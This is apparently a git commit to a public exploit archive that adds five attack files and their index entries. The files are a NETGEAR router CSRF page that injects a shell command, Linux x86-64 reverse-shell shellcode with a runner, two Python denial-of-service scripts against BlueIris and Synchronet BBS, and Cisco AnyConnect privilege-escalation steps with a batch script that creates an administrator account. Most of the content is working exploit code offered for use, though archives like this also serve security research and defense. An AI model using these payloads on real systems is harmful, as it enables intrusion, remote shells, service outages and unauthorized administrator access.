DB: 2017-03-01

5 new exploits BlueIris 4.5.1.4 - Denial of Service Synchronet BBS 3.16c - Denial of Service Cisco AnyConnect Secure Mobility Client 4.3.04027 - Privilege Escalation Linux/x86-64 - Reverse Shell Shellcode (84 bytes) NETGEAR DGN2200v1/v2/v3/v4 - Cross-Site Request Forgery
2017-03-01 05:01:18 +00:00 · 2017-03-01 05:01:18 +00:00 · 7fa7a111c4
commit 7fa7a111c4
parent 026ded7298
6 changed files with 251 additions and 0 deletions
--- a/files.csv
+++ b/files.csv
@ -5384,6 +5384,8 @@ id,file,description,date,author,platform,type,port
 41434,platforms/multiple/dos/41434.html,"Google Chrome - 'layout' Out-of-Bounds Read",2017-02-22,"Google Security Research",multiple,dos,0
 41454,platforms/windows/dos/41454.html,"Microsoft Edge and Internet Explorer - 'HandleColumnBreakOnColumnSpanningElement' Type Confusion",2017-02-24,"Google Security Research",windows,dos,0
 41457,platforms/linux/dos/41457.c,"Linux Kernel 4.4.0 (Ubuntu) - DCCP Double-Free PoC",2017-02-26,"Andrey Konovalov",linux,dos,0
+41474,platforms/windows/dos/41474.py,"BlueIris 4.5.1.4 - Denial of Service",2017-02-28,"Peter Baris",windows,dos,0
+41475,platforms/windows/dos/41475.py,"Synchronet BBS 3.16c - Denial of Service",2017-02-28,"Peter Baris",windows,dos,0
 3,platforms/linux/local/3.c,"Linux Kernel 2.2.x / 2.4.x (RedHat) - 'ptrace/kmod' Privilege Escalation",2003-03-30,"Wojciech Purczynski",linux,local,0
 4,platforms/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Buffer Overflow",2003-04-01,Andi,solaris,local,0
 12,platforms/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,linux,local,0
@ -8820,6 +8822,7 @@ id,file,description,date,author,platform,type,port
 41356,platforms/linux/local/41356.txt,"ntfs-3g - Unsanitized modprobe Environment Privilege Escalation",2017-02-14,"Google Security Research",linux,local,0
 41435,platforms/linux/local/41435.txt,"Shutter 0.93.1 - Code Execution",2016-12-26,Prajith,linux,local,0
 41458,platforms/linux/local/41458.c,"Linux Kernel 4.4.0 (Ubuntu) - DCCP Double-Free Privilege Escalation",2017-02-26,"Andrey Konovalov",linux,local,0
+41476,platforms/windows/local/41476.txt,"Cisco AnyConnect Secure Mobility Client 4.3.04027 - Privilege Escalation",2017-02-28,Pcchillin,windows,local,0
 1,platforms/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Exploit",2003-03-23,kralor,windows,remote,80
 2,platforms/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote Exploit (PoC)",2003-03-24,RoMaNSoFt,windows,remote,80
 5,platforms/windows/remote/5.c,"Microsoft Windows - RPC Locator Service Remote Exploit",2003-04-03,"Marcin Wolak",windows,remote,139
@ -15920,6 +15923,7 @@ id,file,description,date,author,platform,type,port
 41439,platforms/linux/shellcode/41439.c,"Linux/x86-64 - Egghunter Shellcode (38 bytes)",2017-02-23,odzhancode,linux,shellcode,0
 41467,platforms/win_x86/shellcode/41467.c,"Windows x86 - Executable Directory Search Shellcode (130 bytes)",2017-02-26,"Krzysztof Przybylski",win_x86,shellcode,0
 41468,platforms/lin_x86-64/shellcode/41468.nasm,"Linux/x86_64 - Random Listener Shellcode (54 bytes)",2017-02-26,"Robert L. Taylor",lin_x86-64,shellcode,0
+41477,platforms/linux/shellcode/41477.c,"Linux/x86-64 - Reverse Shell Shellcode (84 bytes)",2017-02-28,"Manuel Mancera",linux,shellcode,0
 6,platforms/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,php,webapps,0
 44,platforms/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",php,webapps,0
 47,platforms/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,php,webapps,0
@ -37387,3 +37391,4 @@ id,file,description,date,author,platform,type,port
 41465,platforms/php/webapps/41465.txt,"Joomla! Component JomSocial - SQL Injection",2017-02-25,"Ihsan Sencan",php,webapps,0
 41466,platforms/java/webapps/41466.py,"Grails PDF Plugin 0.6 - XML External Entity Injection",2017-02-21,"Charles Fol",java,webapps,0
 41470,platforms/php/webapps/41470.txt,"Joomla! Component OneVote! 1.0 - SQL Injection",2017-02-27,"Ihsan Sencan",php,webapps,0
+41472,platforms/hardware/webapps/41472.html,"NETGEAR DGN2200v1/v2/v3/v4 - Cross-Site Request Forgery",2017-02-28,SivertPL,hardware,webapps,0
--- a/platforms/hardware/webapps/41472.html
+++ b/platforms/hardware/webapps/41472.html
@ -0,0 +1,26 @@
+# Exploit Title: NETGEAR Firmware DGN2200v1/v2/v3/v4 CSRF which leads to RCE through CVE-2017-6334
+# Date: 2017-02-28
+# Exploit Author: SivertPL
+# Vendor Homepage: http://netgear.com/
+# Software Link: http://www.downloads.netgear.com/files/GDC/DGN2200/DGN2200%20Firmware%20Version%201.0.0.20%20-%20Initial%20Release%20(NA).zip
+# Version: 10.0.0.20 (initial) - 10.0.0.50 (latest, still 0-day!)
+# Tested on: DGN2200v1,v2,v3,v4
+
+# CVE: CVE-2017-6366
+
+A quite dangerous CSRF was discovered on all DGN2200 firmwares.
+When chained with either CVE-2017-6077 or CVE-2017-6334, allows for unauthenticated (sic!) RCE after tricking somebody logged in to the router to view a website.
+
+<!DOCTYPE html>
+<html>
+	<title>netgear router CSRF</title>
+	<body>
+		<form method="POST" action="http://192.168.0.1/dnslookup.cgi">
+			<input type="hidden" name="host_name" value="www.google.com; reboot"> <!-- CVE-2017-6334 payload -->
+			<input type="hidden" name="lookup" value="Lookup">
+			<button name="clc" value="clc">Would You Dare To?</button> 
+		</form>
+	</body>
+</html>
+
+<!-- 2017-02-27 by SivertPL -->
--- a/platforms/linux/shellcode/41477.c
+++ b/platforms/linux/shellcode/41477.c
@ -0,0 +1,80 @@
+/*
+ Title: Linux/x86-64 - Reverse TCP shellcode - 84 bytes
+ Author: Manuel Mancera (@sinkmanu)
+ Tested on: 3.16.0-4-amd64 #1 SMP Debian 3.16.39-1 (2016-12-30) x86_64
+GNU/Linux
+
+----------------- Assembly code -------------------
+
+section .text
+        global _start
+
+_start:
+        push 0x2d01a8c0                         ; Address (192.168.1.45)
+        push word 0x5c11                        ; Port (4444)
+        push word 2                             ; Address family -
+AF_INET (0x2)
+        push 42                                 ; connect syscall
+        push byte 16                            ; length
+        push byte 41                            ; socket syscall
+        push byte 1                             ; type - SOCK_STREAM (0x1)
+        push byte 2                             ; family - AF_INET (0x2)
+
+        pop rdi                                 ; family
+        pop rsi                                 ; type
+        xor rdx, rdx                            ; protocol
+        pop rax                                 ; socket syscall
+        syscall
+
+        mov rdi, rax                            ; sockfd
+        pop rdx                                 ; length
+        pop rax                                 ; connect syscall
+        mov rsi, rsp                            ; sockaddr
+        syscall
+
+        xor rsi, rsi
+loop:
+        mov al, 33
+        syscall
+        inc rsi
+        cmp rsi, 2
+        jle loop
+
+        xor rax, rax
+        mov rdi, 0x68732f6e69622f2f
+        xor rsi, rsi
+        push rsi
+        push rdi
+        mov rdi, rsp
+        xor rdx, rdx
+        mov al, 59
+        syscall
+
+
+---------------------------------------------------
+$ nasm -f elf64 reverse-tcp-shell.asm -o reverse-tcp-shell.o
+$ ld reverse-tcp-shell.o -o reverse-tcp-shell
+$ objdump -d ./reverse-tcp-shell|grep '[0-9a-f]:'|grep -v 'file'|cut -f2
+-d:|cut -f1-7 -d' '|tr -s ' '|tr '\t' ' '|sed 's/ $//g'|sed 's/
+/\\x/g'|paste -d '' -s |sed 's/^/"/'|sed 's/$/"/g'
+"\x68\xc0\xa8\x01\x2d\x66\x68\x11\x5c\x66\x6a\x02\x6a\x2a\x6a\x10\x6a\x29\x6a\x01\x6a\x02\x5f\x5e\x48\x31\xd2\x58\x0f\x05\x48\x89\xc7\x5a\x58\x48\x89\xe6\x0f\x05\x48\x31\xf6\xb0\x21\x0f\x05\x48\xff\xc6\x48\x83\xfe\x02\x7e\xf3\x48\x31\xc0\x48\xbf\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x48\x31\xf6\x56\x57\x48\x89\xe7\x48\x31\xd2\xb0\x3b\x0f\x05"
+$ gcc -fno-stack-protector -z execstack shellcode.c -o shellcode
+$ ./shellcode
+Length: 84 bytes
+ 
+*/
+
+
+#include <stdio.h>
+#include <string.h>
+
+const char code[] =  \
+"\x68\xc0\xa8\x01\x2d\x66\x68\x11\x5c\x66\x6a\x02\x6a\x2a\x6a\x10\x6a\x29\x6a\x01\x6a\x02\x5f\x5e\x48\x31\xd2\x58\x0f\x05\x48\x89\xc7\x5a\x58\x48\x89\xe6\x0f\x05\x48\x31\xf6\xb0\x21\x0f\x05\x48\xff\xc6\x48\x83\xfe\x02\x7e\xf3\x48\x31\xc0\x48\xbf\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x48\x31\xf6\x56\x57\x48\x89\xe7\x48\x31\xd2\xb0\x3b\x0f\x05";
+
+int main()
+{
+    printf("Length: %d bytes\n", strlen(code));
+    (*(void(*)()) code)();
+    return 0;
+}
+
--- a/platforms/windows/dos/41474.py
+++ b/platforms/windows/dos/41474.py
@ -0,0 +1,31 @@
+import socket
+
+
+# Title: BlueIris - Denial of Service
+# Date: 2017-02-28
+# Exploit Author: Peter Baris
+# Vendor Homepage: http://www.saptech-erp.com.au
+# Software Link: http://blueirissoftware.com/blueiris.exe
+# Version: 4.5.1.4
+# Tested on: Windows Server 2008 R2 Standard x64
+
+
+# Start this fake FTP server and create an FTP connection in the software. Use the "Test" button to trigger the vulnerability.
+
+buffer = "A"*5000
+port = 21
+s = socket.socket()
+ip = '0.0.0.0'             
+s.bind((ip, port))            
+s.listen(5)                    
+
+ 
+print 'Listening on FTP port: '+str(port)
+ 
+while True:
+	conn, addr = s.accept()     
+	conn.send('220 '+buffer+'\r\n')
+	conn.recv(1024)
+	conn.send('250 '+buffer+'\r\n')
+	conn.close()
+	
--- a/platforms/windows/dos/41475.py
+++ b/platforms/windows/dos/41475.py
@ -0,0 +1,82 @@
+# Exploit Title: Synchronet BBS 3.16c for Windows – Multiple vulnerabilities
+# Date: 2017-02-28
+# Exploit Author: Peter Baris
+# Vendor Homepage: http://www.saptech-erp.com.au
+# Software Link: ftp://synchro.net/Synchronet/sbbs316c.zip
+# Version: 3.16c for Windows
+# Tested on: Windows 7 Pro SP1 x64, Windows Server 2008 R2 Standard x64 
+# CVE : CVE-2017-6371
+
+import socket
+import time
+import sys
+
+try:
+    host = sys.argv[1]
+    port = 80
+except IndexError:
+    print "[+] Usage %s <host>  " % sys.argv[0]
+    sys.exit()
+
+
+exploit = "\x41"*4096
+
+buffer = "GET /index.ssjs HTTP/1.1\r\n"
+buffer+= "Host: 192.168.198.129\r\n"
+buffer+= "User-Agent: Mozilla/5.0 (X11; Linux i686; rv:44.0) Gecko/20100101 Firefox/44.0 Iceweasel/44.0.2\r\n"
+buffer+="Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\
+r\n"
+buffer+="Accept-Language: en-US,en;q=0.5\r\n"
+buffer+="Accept-Encoding: gzip, deflate\r\n"
+buffer+="Referer: "+exploit+"\r\n"
+buffer+="Connection: keep-alive\r\n"
+buffer+="Content-Type: application/x-www-form-urlencoded\r\n"
+buffer+="Content-Length: 5900\r\n\r\n"
+
+i = 1
+while i < 957:
+	try:
+		s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+		connect=s.connect((host,port))
+		print("[*] Try: "+str(i))
+		s.send(buffer)
+		s.close()
+		i=i+1
+	except:
+		print("[-] The service seems to be down\r\n")
+		break
+
+
+print("[i] Waiting a few seconds before starting a second attack.\r\n")
+time.sleep(25)
+print("[*] Second run to trigger the DoS")
+i = 1
+while i < 957:
+        try:
+		s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+                connect=s.connect((host,port))
+                print("[*] Try: "+str(i))
+                s.send(buffer)
+                s.close()
+                i=i+1
+        except:
+                print("[-] The service seems to be down.\r\n")
+                break
+
+print("[i] Wait before the final strike.\r\n")
+time.sleep(25)
+print("[*] Third run to trigger the DoS")
+i = 1
+while i < 957:
+        try:
+                s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+                connect=s.connect((host,port))
+                print("[*] Try: "+str(i))
+                s.send(buffer)
+                s.close()
+                i=i+1
+        except:
+                print("[-] The service seems to be down.\r\n")
+                print("[!] It can take a few seconds for the service to crash\r\n")
+                break
+
--- a/platforms/windows/local/41476.txt
+++ b/platforms/windows/local/41476.txt
@ -0,0 +1,27 @@
+# Exploit Title: Cisco AnyConnect Start Before Logon (SBL) local privilege escalation. CVE-2017-3813
+# Date: 02/27/2017
+# Exploit Author: @Pcchillin
+# Software Link: http://www.cisco.com/c/en/us/support/security/anyconnect-secure-mobility-client/tsd-products-support-series-home.html
+# Version: 4.3.04027 and earlier
+# Tested on: Windows 10
+# CVE : CVE-2017-3813
+# Vendor ID : cisco-sa-20170208-anyconnect
+
+
+#Run CMD.EXE with system privileges
+1. Start Cisco anyconnect from logon screen.
+2. Once the Cisco app comes up (where you can select a profile and hit connect) hold CTRL and hit B.
+3. When the Cisco about window appears then select the URL at the bottom. This will open Internet Explorer or you can select Chrome if installed.
+4. Once Internet Explorer is started press CTRL-O, then select browse. Chrome press CTRL-O and explorer will open.
+5. You can then navigate to the C:\Windows\System32\ folder and find CMD.exe then right click and select RunAsAdministrator.
+
+
+#Run scripts from USB flash drive
+Follow steps from above and navigate to the flash drive right click and select run. You can also edit the document.
+Example bat script:
+Net user #USERNAME #PASSWORD /add
+Net localgroup administrators #USERNAME /add
+
+
+#Vendor link to advisory: https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20170208-anyconnect
+#Twitter handle @pcchillin